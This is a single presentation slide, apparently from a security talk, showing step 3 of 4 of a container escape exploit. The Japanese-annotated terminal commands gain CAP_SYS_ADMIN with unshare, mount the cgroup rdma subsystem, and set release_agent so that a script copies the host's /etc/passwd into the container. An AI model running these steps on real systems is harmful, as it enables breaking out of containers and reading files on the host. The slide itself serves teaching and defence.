Slide 9
Slide 9 text
Copyrights©3-shake Inc. All Rights Reserved. 9
root@ab988587a245:/# mount -t cgroup -o rdma cgroup /mnt ← 4. CAP_SYS_ADMIN を持たないのでマウントできない
mount: /mnt: permission denied.
root@ab988587a245:/# unshare -rmC bash ← 5. user, mount, cgroup を分離
root@ab988587a245:/# cat /proc/self/status | grep CapEff
CapEff: 000001ffffffffff
root@ab988587a245:/# capsh --decode=000001ffffffffff
0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_i
mmutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_s
ys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mkno
d,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap
_audit_read,38,39,40 ← 6. CAP_SYS_ADMIN を持つ
root@ab988587a245:/# mount -t cgroup -o rdma cgroup /mnt ← 7. rdma サブシステムをマウント
root@ab988587a245:/# ls /mnt
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks
root@ab988587a245:/# mount | grep 'cgroup (rw'
cgroup on /mnt type cgroup (rw,relatime,rdma)
root@ab988587a245:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@ab988587a245:/# echo $host_path
/var/lib/docker/overlay2/20c4102a1a817b0e564734054b876c051732c62f4993ce682508ac7cd7fcb1c6/diff ← 8. docker 内のルートパス (upperdir)
root@ab988587a245:/# echo "$host_path/cmd" > /mnt/release_agent
root@ab988587a245:/# echo '#!/bin/sh' > /cmd
root@ab988587a245:/# echo "cat /etc/passwd > $host_path/output" >> /cmd
エクスプロイト (3/4)